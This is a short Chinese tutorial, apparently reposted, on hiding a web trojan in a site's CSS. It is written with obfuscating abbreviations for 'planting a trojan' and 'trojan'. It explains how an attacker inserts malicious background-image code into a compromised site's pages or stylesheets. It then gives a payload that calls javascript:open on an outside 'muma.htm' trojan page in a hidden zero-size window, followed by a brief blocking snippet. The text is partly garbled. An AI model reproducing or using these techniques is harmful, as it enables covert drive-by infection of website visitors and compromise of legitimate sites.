方式1：

    Body

    “background-image”在CSS中的主要功能是用来定义页面的背景图片。这是最典型的CSSgm方式，这段恶意代码主要是通过“background-image”配合t代码让网页mm悄悄地在用户的电脑中运行。

    那如何将这段CSS恶意代码挂到正常的网页中去呢？hk可以将生成好的网页mm放到自己指定的位置，然后将该段恶意代码写入gm网站的网页中，或者gm网页所调用的CSS文件中。

    小百科：

    使用Body对象元素，主要是为了让对象不再改变整个网页文档的内容，通过Body对象的控制，可以将内容或者效果控制在指定的大小内，如同使用DIV对象那样精确地设置大小。

    方式2：

    Body

    background-image：url（t：open（”http：//www.X.com/muma.htm”，”newwindow”，”border=”1″Height=0，Width=0，top=1000，center=0，toolbar=no，menubar=no，scrollbars=no，resizable=no，location=no，status=no”））

    emiao1：expression（this.src=”about：blank”，this.outerHTML=”“）；

    将外域的mm代码的src重写成本地IE404错误页面的地址，这样，外域的t代码不会被下载。不过阻断方式也有天生致命的弱点，弱点的秘密我们将于下次揭晓。（作者：Barry）

本篇文章来源于 原文链接